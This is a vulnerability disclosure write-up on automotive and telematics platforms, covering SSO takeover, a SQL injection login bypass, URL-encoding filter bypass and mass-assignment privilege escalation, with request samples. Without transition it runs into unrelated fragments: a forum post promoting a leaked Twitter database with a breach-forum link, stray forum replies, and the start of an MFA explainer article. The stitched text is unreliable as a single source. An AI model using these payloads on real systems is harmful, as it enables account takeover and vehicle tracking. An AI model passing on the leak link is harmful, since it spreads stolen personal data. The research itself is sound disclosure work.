(1) Full Account Takeover on BMW and Rolls Royce via Misconfigured SSO

While testing BMW assets, we identified a custom SSO portal for employees and contractors of BMW.
This was super interesting to us, as any vulnerabilities identified here could potentially allow an attacker to compromise any account connected to all of BMW's assets. For instance, if a dealer wanted to access the dealer portal at a physical BMW dealership, they would have to authenticate through this portal. Additionally, this SSO portal was used to access internal tools and related devops infrastructure.

The first thing we did was fingerprint the host using OSINT tools like gau and ffuf. After a few hours of fuzzing, we identified a WADL file which exposed API endpoints on the host via sending the following HTTP request:

```
GET /rest/api/application.wadl HTTP/1.1
Host: xpita.bmwgroup.com
```

The HTTP response contained all available REST endpoints on the xpita host. We began enumerating the endpoints and sending mock HTTP requests to see what functionality was available.

One immediate finding was that we were able to query all BMW user accounts via sending asterisk queries in the user field API endpoint. This allowed us to enter something like "sam*" and retrieve the user information for a user named "sam.curry" without having to guess the actual username.

HTTP Request

```
GET /rest/api/users/example* HTTP/1.1
Host: xpita.bmwgroup.com
```

HTTP Response

```
HTTP/1.1 200 OK
Content-type: application/json

{"id":"redacted","firstName":"Example","lastName":"User","userName":"example.user"}
```

Once we found this vulnerability, we continued testing the other accessible API endpoints. One particularly interesting one which stood out immediately was the "/rest/api/chains/accounts/:user_id/totp" endpoint. We noticed the word "totp", which usually stands for one-time password generation.

When we sent an HTTP request to this endpoint using the SSO user ID gained from the wildcard query paired with the TOTP endpoint, it returned a random 7-digit number.
The following HTTP request and response demonstrate this behavior:

HTTP Request

```
GET /rest/api/chains/accounts/unique_account_id/totp HTTP/1.1
Host: xpita.bmwgroup.com
```

HTTP Response

```
HTTP/1.1 200 OK
Content-type: text/plain

9373958
```

For whatever reason, it appeared that this HTTP request would generate a TOTP for the user's account. We guessed that this interaction worked with the "forgot password" functionality, so we found an example user account by querying "example*" using our original wildcard finding and retrieving the victim user ID.

After retrieving this ID, we initiated a password reset attempt for the user account until we got to the point where the system requested a TOTP code from the user's 2FA device (e.g. email or phone). At this point, we retrieved the TOTP code generated from the API endpoint and entered it into the reset password confirmation field.

It worked! We had reset a user account, gaining full account takeover of any BMW employee or contractor account.

At this point, it was possible to completely take over any BMW or Rolls Royce employee account and access tools used by those employees. To demonstrate the impact of the vulnerability, we simply Googled "BMW dealer portal" and used our account to access the dealer portal used by sales associates working at physical BMW and Rolls Royce dealerships.

After logging in, we observed that the demo account we took over was tied to an actual dealership, and we could access all of the functionality that the dealers themselves had access to. This included the ability to query a specific VIN number and retrieve sales documents for the vehicle.

With our level of access, there was a huge amount of functionality we could've performed against BMW and Rolls Royce customer accounts and customer vehicles. We stopped testing at this point and reported the vulnerability. The vulnerabilities reported to BMW and Rolls Royce have since been fixed.
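For context, one-time codes like the 7-digit value above are normally derived per RFC 4226/RFC 6238 from a per-user secret. A minimal HOTP sketch (the standard algorithm, not BMW's actual implementation) shows why an endpoint that simply hands out the current code defeats 2FA: the attacker never needs the secret.

```python
# HOTP per RFC 4226 (TOTP in RFC 6238 is HOTP over a time-based counter).
# If a server exposes the current code through an unauthenticated endpoint,
# the secrecy of `secret` no longer matters: the attacker just asks for it.
import hmac, hashlib, struct

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                     # dynamic truncation offset
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

# RFC 4226 Appendix D test vector: secret "12345678901234567890", counter 0
assert hotp(b"12345678901234567890", 0) == "755224"
```

The BMW endpoint effectively played the role of the server-side `hotp()` call, returning the freshly generated code to anyone who asked for a given user ID.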
(2) Remote Code Execution and Access to Hundreds of Internal Tools on Mercedes-Benz and Rolls Royce via Misconfigured SSO

Early in our testing, someone in our group had purchased a Mercedes-Benz vehicle, so we began auditing the Mercedes-Benz infrastructure. We took the same approach as with BMW and began testing the Mercedes-Benz employee SSO.

We weren't able to find any vulnerabilities affecting the SSO portal itself, but by exploring the SSO website we observed that they were running some form of LDAP for the employee accounts. Based on our high-level understanding of their infrastructure, we guessed that the individual employee applications used a centralized LDAP system to authenticate users. We began exploring each of these websites in an attempt to find a public registration form, so we could gain SSO credentials to access, even at a limited level, the employee applications.

After fuzzing random sites for a while, we eventually found the "umas.mercedes-benz.com" website, which was built for vehicle repair shops to request specific tools access from Mercedes-Benz. The website had public registration enabled, as it was built for repair shops, and appeared to write to the same database as the core employee LDAP system.

We filled out all the required fields for registration, created a user account, then used our recon data to identify sites which redirected to the Mercedes-Benz SSO. The first one we attempted was a pretty obvious employee tool: "git.mercedes-benz.com", the company's Github instance. We attempted to use our user credentials to sign in to the Mercedes-Benz Github and saw that we were able to log in. Success!

The Mercedes-Benz Github, after authenticating, asked us to set up 2FA on our account so we could access the app. We installed the 2FA app, added it to our account, entered our code, and we were in. We had access to "git.mercedes-benz.com" and began looking around.
After a few minutes, we saw that the Github instance had internal documentation and source code for various Mercedes-Benz projects, including the Mercedes Me Connect app, which was used by customers to remotely connect to their vehicles. The internal documentation gave detailed instructions for employees to follow if they wanted to build an application for Mercedes-Benz themselves to talk to customer vehicles, and the specific steps one would have to take to do so.

At this point, we reported the vulnerability, but got some pushback after a few days of waiting on an email response. The team seemed to misunderstand the impact, so they asked us to demonstrate further impact. We used our employee account to log in to numerous applications which contained sensitive information, and achieved remote code execution via exposed actuators, Spring Boot consoles, and dozens of sensitive internal applications used by Mercedes-Benz employees.

One of these applications was the Mercedes-Benz Mattermost (basically Slack). We had permission to join any channel, including security channels, and could pose as a Mercedes-Benz employee who could ask whatever questions necessary for an actual attacker to elevate their privileges across the Benz infrastructure.
To give an overview, we could access the following services:

- Multiple employee-only Githubs with sensitive information containing documentation and configuration files for multiple applications across the Mercedes-Benz infrastructure
- Spring Boot actuators which led to remote code execution and information disclosure on sensitive employee- and customer-facing applications
- Jenkins instances
- AWS and cloud-computing control panels where we could request, manage, and access various internal systems
- XENTRY systems used to communicate with customer vehicles
- Internal OAuth and application-management related functionality for configuring and managing internal apps
- Hundreds of miscellaneous internal services

(3) Full Vehicle Takeover on Kia via Deprecated Dealer Portal

When we looked at Kia, we noticed how its vehicle enrollment process was different from that of its parent company Hyundai. We mapped out all of the domains and came across the "kdealer.com" domain, where dealers are able to register for an account to activate Kia Connect for customers who purchase vehicles.

At this point, we found the domain "kiaconnect.kdealer.com", which allowed us to enroll an arbitrary VIN but required a valid session to work. While looking at the website's main.js code, we observed the following authorization functionality for generating the token required to access the website functionality:

```js
validateSSOToken() {
    const e = this.geturlParam("token"),
        i = this.geturlParam("vin");
    return this.postOffice({
        token: e,
        vin: i
    }, "/prof/gbl/vsso", "POST", "preLogin").pipe(ye(this.processSuccessData), Nn(this.handleError))
}
```

Since we didn't have valid authorization credentials, we continued to search through the JavaScript file until finding the "prelogin" header. This header, when sent, allowed us to initiate enrollment for an arbitrary VIN number. Although we were able to bypass the authorization check for VIN ownership, the website continued throwing errors for an invalid session.
To bypass this, we took a session token from "owners.kia.com" (the site used by customers to remotely connect to their vehicles) and appended it to our request to pair the VIN number to a customer account.

Something really interesting to note: for every Kia account that we queried, the server returned an associated profile with the email "daspike11@yahoo.com". We're not sure if this email address has access to the user account, but based on our understanding of the Kia website it appeared that the email address was connected to every account that we had searched. We've asked the Kia team for clarification but haven't heard back on what exactly this is.

Now that we had a valid vehicle initialization session, we could use the JSON returned in the HTTP response from pairing the customer's account to continue the vehicle takeover. We would use the "prelogin" header once again to generate a dealer token (intended to be accessed by Kia dealers themselves) to pair any vehicle to the attacker's customer account.

Lastly, we can just head to the link to finish the activation and enrollment. The attacker will receive a link via email on their Kia customer account after the above dealer pairing process is completed. The activation portal is the final step to pair the Kia vehicle to the attacker's customer account.

After filling out the activation form, it takes about 1-2 minutes for Kia Connect to fully activate and give full access to send lock, unlock, remote start, remote stop, locate, and (most interestingly) remotely access vehicle cameras!

(4) Full Account Takeover on Ferrari and Arbitrary Account Creation allows Attacker to Access, Modify, and Delete All Customer Information and Access Administrative CMS Functionality to Manage Ferrari Websites

When we began targeting Ferrari, we mapped out all domains under the publicly available domains like "ferrari.com" and browsed around to see what was accessible.
One target we found was "api.ferrari.com", a domain which offered both customer-facing and internal APIs for Ferrari systems. Our goal was to get the highest level of access possible for this API.

We analyzed the JavaScript present on several Ferrari subdomains that looked like they were for use by Ferrari dealers. These subdomains included `cms-dealer.ferrari.com`, `cms-new.ferrari.com` and `cms-dealer.test.ferrari.com`.

One of the patterns we notice when testing web applications is poorly implemented single sign-on functionality which does not restrict access to the underlying application. This was the case for the above subdomains. It was possible to extract the JavaScript present for these applications, allowing us to understand the backend API routes in use.

When reverse engineering JavaScript bundles, it is important to check what constants have been defined for the application. Often these constants contain sensitive credentials or, at the very least, tell you where the backend API that the application talks to is located. For this application, we noticed the following constants were set:

```js
const i = {
    production: !0,
    envName: "production",
    version: "0.0.0",
    build: "20221223T162641363Z",
    name: "ferrari.dws-preowned.backoffice",
    formattedName: "CMS SPINDOX",
    feBaseUrl: "https://{{domain}}.ferraridealers.com/",
    fePreownedBaseUrl: "https://{{domain}}.ferrari.com/",
    apiUrl: "https://api.ferrari.com/cms/dws/back-office/",
    apiKey: "REDACTED",
    s3Bucket: "ferrari-dws-preowned-pro",
    cdnBaseUrl: "https://cdn.ferrari.com/cms/dws/media/",
    thronAdvUrl: "https://ferrari-app-gestioneautousate.thron.com/?fromSAML#/ad/"
}
```

From the above constants we can understand that the base API URL is `https://api.ferrari.com/cms/dws/back-office/` and a potential API key for this API is `REDACTED`. Digging further into the JavaScript, we can look for references to `apiUrl`, which will inform us as to how this API is called and how the API key is being used.
For example, the following JavaScript sets certain headers if the API URL is being called:

```js
})).url.startsWith(x.a.apiUrl) && !["/back-office/dealers", "/back-office/dealer-settings", "/back-office/locales", "/back-office/currencies", "/back-office/dealer-groups"].some(t => !!e.url.match(t)) && (e = (e = e.clone({
    headers: e.headers.set("Authorization", "" + (s || void 0))
})).clone({
    headers: e.headers.set("x-api-key", "" + a)
}));
```

All the elements needed for this discovery were conveniently tucked away in this JavaScript file. We knew what backend API to talk to and its routes, as well as the API key we needed to authenticate to the API.

Within the JavaScript, we noticed an API call to `/cms/dws/back-office/auth/bo-users`. When requesting this API through Burp Suite, it leaked all of the users registered for the Ferrari Dealers application. Furthermore, it was possible to send a POST request to this endpoint to add ourselves as a super admin user.

While impactful, we were still looking for a vulnerability that affected the broader Ferrari ecosystem and every end user.
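Constant-hunting of this kind is easy to automate. A rough sketch follows; the scanner, the key names it looks for, and the sample bundle string are invented for illustration, not Ferrari's actual code:

```python
# Scan a JavaScript bundle for constant definitions that commonly leak
# secrets or backend locations (apiKey, apiUrl, buckets, tokens).
# The regex is deliberately loose; real bundles may need smarter parsing.
import re

INTERESTING = re.compile(
    r'\b(apiKey|apiUrl|s3Bucket|secret|token)\s*:\s*"([^"]+)"', re.I)

def scan_bundle(js: str) -> dict:
    return {name: value for name, value in INTERESTING.findall(js)}

bundle = 'const i={apiUrl:"https://api.example.com/back-office/",apiKey:"abc123",version:"0.0.0"}'
found = scan_bundle(bundle)
# found == {'apiUrl': 'https://api.example.com/back-office/', 'apiKey': 'abc123'}
```

Running something like this over every downloaded bundle surfaces the same `apiUrl`/`apiKey` pairs that were found here by hand.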
Spending more time deconstructing the JavaScript, we found some API calls were being made to `rest-connectors`:

```js
return t.prototype.getConnectors = function() {
    return this.httpClient.get("rest-connectors")
}, t.prototype.getConnectorById = function(t) {
    return this.httpClient.get("rest-connectors/" + t)
}, t.prototype.createConnector = function(t) {
    return this.httpClient.post("rest-connectors", t)
}, t.prototype.updateConnector = function(t, e) {
    return this.httpClient.put("rest-connectors/" + t, e)
}, t.prototype.deleteConnector = function(t) {
    return this.httpClient.delete("rest-connectors/" + t)
}, t.prototype.getItems = function() {
    return this.httpClient.get("rest-connector-models")
}, t.prototype.getItemById = function(t) {
    return this.httpClient.get("rest-connector-models/" + t)
}, t.prototype.createItem = function(t) {
    return this.httpClient.post("rest-connector-models", t)
}, t.prototype.updateItem = function(t, e) {
    return this.httpClient.put("rest-connector-models/" + t, e)
}, t.prototype.deleteItem = function(t) {
    return this.httpClient.delete("rest-connector-models/" + t)
}, t
```

The following request unlocked the final piece of the puzzle; sending it revealed a treasure trove of API credentials for Ferrari:

```
GET /cms/dws/back-office/rest-connector-models HTTP/1.1
```

To explain this endpoint's purpose: Ferrari had configured a number of backend APIs that could be communicated with by hitting specific paths. When hitting this API endpoint, it returned the list of API endpoints, hosts, and authorization headers (in plain text). This information disclosure allowed us to query Ferrari's production API to access the personal information of any Ferrari customer. In addition to being able to view these API endpoints, we could also register new rest connectors or modify existing ones.
HTTP Request

```
GET /core/api/v1/Users?email=ian@ian.sh HTTP/1.1
Host: fcd.services.ferrari.com
```

HTTP Response

```
HTTP/1.1 200 OK
Content-type: application/json

…"guid":"2d32922a-28c4-483e-8486-7c2222b7b59c","email":"ian@ian.sh","nickName":"ian@ian.sh","firstName":"Ian","lastName":"Carroll","birthdate":"1963-12-11T00:00:00"…
```

The API key and production endpoints that were disclosed using the previous staging API key allowed an attacker to access, create, modify, and delete any production user account. It additionally allowed an attacker to query users via email address or nickname. An attacker could also POST to the "/core/api/v1/Users/:id/Roles" endpoint to edit their user roles, setting themselves to have super-user permissions or become a Ferrari owner.

This vulnerability would allow an attacker to access, modify, and delete any Ferrari customer account with access to manage their vehicle profile.

(5) SQL Injection and Regex Authorization Bypass on Spireon Systems allows Attacker to Access, Track, and Send Arbitrary Commands to 15 million Telematics systems and Additionally Fully Takeover Fleet Management Systems for Police Departments, Ambulance Services, Truckers, and Many Business Fleet Systems

When identifying car-related targets to hack on, we found the company Spireon. In the early 90s and 2000s, there were a few companies like OnStar, Goldstar, and FleetLocate which sold standalone devices that were put into vehicles to track and manage them. The devices have the capability to be tracked and to receive arbitrary commands, e.g. locking the starter so the vehicle cannot start.

Sometime in the past, Spireon had acquired many GPS vehicle tracking and management companies and put them under the Spireon parent company. We read through the Spireon marketing and saw that they claimed to have over 15 million connected vehicles. They offered services directly to customers and additionally many services through their subsidiary companies like OnStar.
We decided to research them because, if an attacker were able to compromise the administration functionality for these devices and fleets, they would be able to perform actions against over 15 million vehicles, with very interesting capabilities like sending a city's police officers a dispatch location, disabling vehicle starters, and accessing financial loan information for dealers.

Our first target for this was very obvious: admin.spireon.com

The website appeared to be a very out of date global administration portal for Spireon employees to authenticate and perform some sort of action. We attempted to identify interesting endpoints which were accessible without authorization, but kept getting redirected back to the login. Since the website was so old, we tried the trusty manual SQL injection payloads, but were kicked out by a WAF that was installed on the system.

We switched to a much simpler payload: sending an apostrophe, seeing if we got an error, then sending two apostrophes and seeing if we did not get an error. This worked! The system appeared to be reacting to sending an odd versus even number of apostrophes. This indicated that our input in both the username and password fields was being passed to a system which could likely be vulnerable to some sort of SQL injection attack.

For the username field, we came up with a very simple payload:

```
victim' #
```

The above payload was designed to simply cut off the password check from the SQL query. We sent this HTTP request to Burp Suite's Intruder with a common username list and observed that we received various 301 redirects to "/dashboard" for the usernames "administrator" and "admin".

After manually sending the HTTP request using the admin username, we observed that we were authenticated into the Spireon administrator portal as an administrator user. At this point, we browsed around the application and saw many interesting endpoints. The functionality was designed to manage Spireon devices remotely.
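The `victim' #` payload works because `#` begins a comment in MySQL. A sketch of the likely query shape and what survives the comment follows; the query itself is a guess at what a legacy login form might build, not Spireon's actual code:

```python
# Illustration of the "victim' #" payload against a naively concatenated
# login query. '#' starts a MySQL comment, discarding the password check.
def build_query(username: str, password: str) -> str:
    # Hypothetical vulnerable string concatenation, as in old PHP apps.
    return ("SELECT * FROM users WHERE username = '%s' "
            "AND password = '%s'" % (username, password))

def effective_sql(query: str) -> str:
    # What the MySQL parser actually evaluates once the comment starts.
    return query.split("#", 1)[0].rstrip()

raw = build_query("admin' #", "anything")
print(effective_sql(raw))  # SELECT * FROM users WHERE username = 'admin'
```

The injected apostrophe closes the username literal, and the comment swallows both the dangling quote and the entire `AND password = …` clause, so any password is accepted for "admin".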
The administrator user had access to all Spireon devices, including those of OnStar, GoldStar, and FleetLocate. We could query these devices, retrieve the live location of whatever the devices were installed on, and additionally send arbitrary commands to them. There was additional functionality to overwrite the device configuration, including which servers it reached out to in order to download updated firmware.

Using this portal, an attacker could create a malicious Spireon package, update the vehicle configuration to call out to the modified package, then download and install the modified Spireon software. At this point, an attacker could backdoor the Spireon device and run arbitrary commands against it.

Since these devices were very ubiquitous and were installed on things like tractors, golf carts, police cars, and ambulances, the impact of each device differed. For some, we could only access the live GPS location of the device, but for others we could disable the starter and send police and ambulance dispatch locations.

We reported the vulnerability immediately, but during testing, we observed an HTTP 500 error which disclosed the API URL of the backend API endpoint that the "admin.spireon.com" service reached out to. Initially, we dismissed this as we assumed it was internal, but after circling back we observed that we could hit the endpoint and it would trigger an HTTP 403 forbidden error.

Our goal now was seeing if we could find some sort of authorization bypass on the host and what endpoints were accessible. By bypassing the administrator UI, we could reach out to each device directly and query vehicles and user accounts via the backend API calls. We fuzzed the host and eventually observed some weird behavior: when sending any string with "admin" or "dashboard", the system would trigger an HTTP 403 forbidden response, but it would return a 404 if we didn't include this string.
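We never saw Spireon's backend code, but one plausible, purely invented mechanism that reproduces this kind of selective 403 behavior, and the bypass eventually found, is a mismatch between an anchored access filter and a router that normalizes control characters:

```python
# Hypothetical filter/router desync: the access filter applies an anchored
# pattern to the decoded path, while the router strips CR/LF before
# dispatching. "/%0dadmin" decodes to "/\radmin", slips past the anchor,
# yet still routes to /admin. Both functions are invented for illustration.
import re
from urllib.parse import unquote

BLOCKED = re.compile(r"^/(admin|dashboard)")

def filter_blocks(raw_path: str) -> bool:
    return BLOCKED.match(unquote(raw_path)) is not None

def route(raw_path: str) -> str:
    # Router normalizes by stripping CR/LF before matching a handler.
    return unquote(raw_path).replace("\r", "").replace("\n", "")

assert filter_blocks("/admin") is True       # direct request: 403
assert filter_blocks("/%0dadmin") is False   # "/\radmin" evades the anchor
assert route("/%0dadmin") == "/admin"        # ...but still reaches /admin
```

Any two components that decode or normalize a URL differently can produce this class of bypass; %00-%FF prefix fuzzing, as described next, is a quick way to find which byte desynchronizes them.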
As an example, if we attempted to load "/anything-admin-anything" we'd receive 403 forbidden, while if we attempted to load "/anything-anything" it would return a 404.

We took the blacklisted strings, put them in a list, then attempted to enumerate the specific endpoints with fuzzing characters (%00 to %FF) stuck behind the first and last characters. During scanning, we saw that the following HTTP requests would return a 200 OK response:

```
GET /%0dadmin
GET /%0ddashboard
```

Through Burp Suite, we sent the HTTP response to our browser and observed the response: it was a full administrative portal for the core Spireon app. We quickly set up a match-and-replace rule to modify GET /admin and GET /dashboard to the endpoints with the %0d prefix. After setting up this rule, we could browse to "/admin" or "/dashboard" and explore the website without having to perform any additional steps.

We observed that there were dozens of endpoints which were used to query all connected vehicles, send arbitrary commands to connected vehicles, and view all customer tenant accounts, fleet accounts, and customer accounts. We had access to everything.

At this point, a malicious actor could backdoor the 15 million devices, query what ownership information was associated with a specific VIN, retrieve the full user information for all customer accounts, and invite themselves to manage any fleet which was connected to the app.

For our proof of concept, we invited ourselves to a random fleet account and saw that we received an invitation to administrate a US police department where we could track the entire police fleet.

(6) Mass Assignment on Reviver allows an Attacker to Remotely Track and Overwrite the Virtual License Plates for All Reviver Customers, Track and Administrate Reviver Fleets, and Access, Modify, and Delete All User Information

In October 2022, California announced that it had legalized digital license plates.
We researched this for a while and found that most, if not all, of the digital license plates were handled through a company called Reviver. If someone wanted a digital license plate, they'd buy the virtual Reviver license plate, which included a SIM card for remotely tracking and updating the plate. Customers who use Reviver could remotely update their license plate's slogan and background, and additionally report the car as stolen by setting the plate tag to "STOLEN".

Since the license plate could be used to track vehicles, we were super interested in Reviver and began auditing the mobile app. We proxied the HTTP traffic and saw that all API functionality was served from the "pr-api.rplate.com" website. After creating a user account, our account was assigned to a unique "company" JSON object which allowed us to add other sub-users to our account. The company JSON object was super interesting as we could update many of the JSON fields within the object. One of these fields, called "type", defaulted to "CONSUMER". After noticing this, we dug through the app source code in hopes of finding another value to set it to, but were unsuccessful.

At this point, we took a step back and wondered if there was an actual website we could talk to instead of proxying traffic through the mobile app. We looked online for a while before getting the idea to perform a password reset on our account, which gave us a URL to navigate to. Once we opened the password reset URL, we observed that the website had tons of functionality, including the ability to administer vehicles, fleets, and user accounts. This was super interesting as we now had many more API endpoints and much more functionality to access. Additionally, the JavaScript on the website appeared to contain the names of the other roles that our user account could be (e.g. specialized names for user, moderator, admin, etc.).
We queried the "CONSUMER" string in the JavaScript and saw that other roles were defined there. After updating our "role" parameter to the disclosed "CORPORATE" role, we refreshed our profile metadata and saw that it was successful! We were able to change our role to one other than the default user account, opening the door to potential privilege escalation vulnerabilities.

Even though we had updated our account to the "CORPORATE" role, we still received authorization errors when logging into the website. We thought for a while until realizing that we could invite users to our modified account which had the elevated role; the invited users might then be granted the required permissions, since they were added via an intended path rather than by mass assigning an account to an elevated role. After inviting a new account, accepting the invitation, and logging in, we observed that we no longer received authorization errors and could access fleet management functionality. This meant that we could likely (1) mass assign our account to an even higher elevated role (e.g. admin), then (2) invite a user to our account who would be assigned the appropriate permissions.

There was likely some administration group which existed in the system but that we had not yet identified. We brute forced the "type" parameter using wordlists until we noticed that setting our group to the number "4" updated our role to "REVIVER_ROLE". It appeared that the roles were indexed to numbers, so we could simply run through the numbers 0-100 and find all the roles on the website. The "0" role was the string "REVIVER", and after setting this on our account and re-inviting a new user, we logged into the website normally and observed that the UI was completely broken and we couldn't click any buttons.
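The role-probing step above can be sketched as follows. This is a hypothetical reconstruction: the "type" field and the 0-100 index range come from the narrative, but the surrounding payload shape and field names are illustrative assumptions, not Reviver's actual API.

```python
import json

# Build one profile-update body per candidate role index (0-100),
# smuggling the server-managed "type" field in alongside fields a user
# is normally allowed to edit (classic mass-assignment probing).
def role_probe_payloads(max_index=100):
    payloads = []
    for idx in range(max_index + 1):
        body = {
            "firstName": "Test",   # ordinary, user-editable fields
            "lastName": "User",
            "type": idx,           # mass-assigned role index under test
        }
        payloads.append(json.dumps(body))
    return payloads

payloads = role_probe_payloads()
```

Each payload would be sent as a profile update, after which the returned role name (e.g. "REVIVER_ROLE" at index 4) reveals the role table.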
From what we could guess, we had the administrator role but were accessing the account through the customer-facing frontend website rather than the appropriate administrator frontend. We would have to find the endpoints used by administrators ourselves.

Since our administrator account theoretically had elevated permissions, our first test was simply querying a user account and seeing if we could access someone else's data: this worked! We could take any of the normal API calls (viewing vehicle location, updating vehicle plates, adding new users to accounts) and perform the action using our super administrator account with full authorization.

At this point, we reported the vulnerability and observed that it was patched in under 24 hours. An actual attacker could remotely update, track, or delete anyone's Reviver plate. We could additionally access any dealer (e.g. Mercedes-Benz dealerships will often package Reviver plates) and update the default image used by the dealer while the newly purchased vehicle still had DEALER tags. The Reviver website also offered fleet management functionality, which we had full access to.
(7) Full Remote Vehicle Access and Full Account Takeover affecting Hyundai and Genesis
This vulnerability was written up on Twitter and can be accessed on the following thread:

(8) Full Remote Vehicle Access and Full Account Takeover affecting Honda, Nissan, Infiniti, Acura
This vulnerability was written up on Twitter and can be accessed on the following thread:

(9) Full Vehicle Takeover on Nissan via Mass Assignment
This vulnerability was written up on Twitter and can be accessed on the following thread:

Credits
The following people contributed towards this project:
Sam Curry (https://twitter.com/samwcyo)
Neiko Rivera (https://twitter.com/_specters_)
Brett Buerhaus (https://twitter.com/bbuerhaus)
Maik Robert (https://twitter.com/xEHLE_)
Ian Carroll (https://twitter.com/iangcarroll)
Justin Rhinehart (https://twitter.com/sshell_)
Shubham Shah (https://twitter.com/infosec_au)

Special thanks to the following people who helped create this blog post:
Ben Sadeghipour (https://twitter.com/nahamsec)
Joseph Thacker (https://twitter.com/rez0__)

Sursa: https://samcurry.net/web-hackers-vs-the-auto-industry/
Twitter database leaks for free with 235,000,000 records. The database contains 235,000,000 unique records of Twitter users and their email addresses and will unfortunately lead to a lot of hacking, targeted phishing, and doxxing. This is one of the most significant leaks ever. BF: https://breached.vc/Thread-Twitter-DB-Scrape-Leak-200-Mill-Lines?highlight=twitter
Research the company and other companies that belong to the same group, and use Google (e.g. inurl).
Modreveal – Utility to find hidden Linux kernel modules
Nytro replied to Kev's topic in Programe utile
It doesn't do much, but it can be useful in CTFs, for example, or in cases of dumb rootkits.
Cheers, I don't think I've seen it used anywhere; I'd ignore it completely.
CVE-2022-33679 - Windows Kerberos Elevation of Privilege Vulnerability
Nytro replied to Nytro's topic in Exploituri
Yes, I think most of Windows' problems come from junk like this, written 30 years ago.
James Chiappetta
Oct 31

A Dive Into Web Application Authentication

A closer look into Web Application Authentication and what it means at a basic level for consumers and businesses.

By: James Chiappetta, with guest contributions from Jeremy Shulman

Disclaimers: The opinions stated here are the authors' own, not necessarily those of past, current, or future employers. The mention of books, tools, websites, and/or products/services is not a formal endorsement, and the authors have not taken any incentives to mention them. Recommendations are based on past experiences and are not a reflection of future ones.

Background

Take a moment and ask yourself: 10 years ago, which applications did you use that you still use today? Now think about how you authenticated to those apps. Was Multifactor Authentication (MFA) an option? In recent years, authentication implementations have matured; for example, many companies have made MFA mandatory. We will take a look at why some of these changes have occurred and at application authentication more broadly. It's useful to understand where we are today, how we got here, and where we may be in 10 years.

First Things First

Innovation happens naturally and gradually for various problem/solution pairs. There are usually very passionate people on both ends of a problem: one end agitates the problem while the other works to create or improve upon solutions. As this relates here, authentication is a vital function for nearly all consumer and business applications. To get to the heart of what authentication is, here is what we will cover:

What is authentication and how is it different from authorization?
Why do we need multifactor authentication?
How does "sign in with" work (hint: OAuth 2.0) and should you use it?
What is Single Sign On (SSO)?
What is Passwordless Authentication?
What is API Authentication?
Bonus: What are Deep Links?

Let's get to it!
What is Authentication and how is it different from Authorization?

Authentication vs Authorization — Simply put, authentication is the process an application performs to verify that an identity's credentials are valid. If valid, the user or system moves on to the next step, which is typically an authorization check. Authorization is distinctly different from authentication: it is the process of determining whether a valid identity has access to a specific resource.

Typical Authentication Example — You must be thinking: well, how does an application know who I am? Obviously, you would need to be registered with the application first. Here is a basic example. Let's say you want to subscribe to a new online service that will send you a different jelly each month. You navigate to the website and select the "create a new account" option. You pick your username and then set a password. You will likely need to provide an email and prove ownership of it. There you have it: you now have a registered identity in the application and can enter your personal information to receive your jelly each month.

Passwords — These are secrets set for each unique identity of an application. The problem with passwords (and passcodes, for that matter) is that they are set by humans, and humans often seek the path of least resistance. Think of a sticky note on your grandma's monitor. Passwords often get reused across many applications, are set so they are easier to remember, and are stored in insecure locations. This is why a second factor in the authentication process has become commonplace (more on this next).

Super Basic Web Authentication Flow with MFA

Pro tip: Back to authorization for a second. Authorization describes what access you have. It's important to remember that it's not just "what you have access to" but also "what data you can leverage with the access". Fetching a specific person's name is different than being able to fetch every person's name.

Why do we need MFA?
In 2012, LinkedIn reported one of the largest data breaches of the time. Nearly 6.5 million passwords that they knew about were compromised. About 4 years later, they discovered another 100 million were actually compromised. This was one of many credential breaches that can be searched on Troy Hunt's Have I Been Pwned (HIBP) database of hundreds of millions of records. Unfortunately, this is just a fraction of the billions of leaked credentials floating out there. This has translated into a rise in credential stuffing attacks, where a known set of credentials from a compromised service is used on a completely separate one. The industry is seeing double digit growth in these attacks each year. Companies and consumers are usually both on the losing end of these attacks.

What is MFA?

Multifactor Authentication (MFA) — Enter the obvious solution: Multifactor Authentication (MFA). MFA is a common technique to prevent attackers from gaining access to user accounts even if credentials (username+password) are known or guessed. The impact of antiquated password policies has been known for a while, and NIST is helping catch things up with their 800-63B publication. The idea behind MFA is to use at least two different factors for authentication. The three common factors used for MFA are:

1) something you know, like a passcode, in addition to your password
2) something you have, like a soft token (software on your phone) or hard token (USB key)
3) something you are, like a biometric (face, eye, finger, or speech)

Current state of MFA — Back in 2012, there weren't many companies actively considering implementing MFA. Yet here we are 10 years later, with near ubiquity around its adoption. We can partly attribute security breaches in widely used platforms like LinkedIn and games like Fortnite for this. That of course doesn't mean end users are enabling it. A simple Google search trend analysis helps illustrate interest in MFA over time.
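As a concrete illustration of the "something you have" factor: soft tokens typically implement TOTP (RFC 6238), a short code derived from a shared secret and the current 30-second time step. A minimal sketch, checked against the RFC's published test vector:

```python
import base64, hashlib, hmac, struct

def totp(secret_b32, timestamp, digits=6):
    key = base64.b32decode(secret_b32)
    step = int(timestamp // 30)                     # 30-second time window
    msg = struct.pack(">Q", step)                   # counter as big-endian 64-bit int
    mac = hmac.new(key, msg, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                         # dynamic truncation (RFC 4226)
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)

# RFC 6238 test vector: ASCII secret "12345678901234567890" (base32 below),
# time = 59 seconds → 6-digit code "287082"
code = totp("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ", 59)
```

Both the phone app and the server compute this independently, which is why the code works offline and expires on its own.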
Source: Google Trends

Challenges with MFA — We are in a far different spot because of the security events that have transpired over the past 10 years. Our guess is that many generations now know what MFA is and use it in some way today. MFA is here to stay for now, and we will see it continue to evolve. A focus on a better end-user experience will be key to its increased adoption as other solutions like Passwordless mature (more on that later). That said, as with any technology, there are challenges. Here are a few with MFA to be aware of:

Consumer Adoption — Despite the billions of brute force attacks happening each year, people still don't think the risk/reward of enabling MFA makes sense.
Phishing Scams/Smishing — There are nearly endless counts of phishing attempts happening each day. Attackers have kept up with advancements in security measures and can still convince users to provide their multifactor token. Obviously, never provide anyone with any authentication tokens or secrets.
MFA Push Fatigue — Those using an authentication app that supports notifications for approving a login attempt are susceptible to this. It happens when an attacker has user credentials and spams the user with MFA requests, in hopes they click approve to make the notifications go away.
